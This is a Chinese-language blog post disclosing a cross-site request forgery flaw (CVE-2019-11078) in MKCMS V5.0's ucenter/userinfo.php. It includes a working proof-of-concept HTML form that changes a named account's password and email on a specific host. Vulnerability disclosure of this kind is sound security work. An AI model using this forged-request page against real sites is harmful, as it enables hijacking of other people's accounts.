MKCMS V5.0存在CSRF漏洞

  • 内容
  • 相关

一、漏洞摘要


漏洞名称: MKCMS V5.0存在CSRF漏洞
上报日期: 2019-04-04
漏洞发现者: cisk
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0
CVE编号: CVE-2019-11078


二、漏洞概述

CSRF: ucenter/userinfo.php
post请求中没有带token,也没有验证Referer,导致产生csrf漏洞
1.png


三、利用方法

构造如下poc.html,并访问poc.html;将修改lduo123账号的密码

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://v.micool.top/ucenter/userinfo.php" method="POST">
      <input type="hidden" name="u&#95;name" value="lduo123" />
      <input type="hidden" name="u&#95;password" value="123456" />
      <input type="hidden" name="u&#95;phone" value="1314520" />
      <input type="hidden" name="u&#95;qq" value="" />
      <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />
      <input type="hidden" name="save" value="" />
      <input type="submit" value="Submit request" />
    </form>    
  </body>
</html>

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:MKCMS V5.0存在CSRF漏洞 - https://www.0dayhack.com/post-875.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注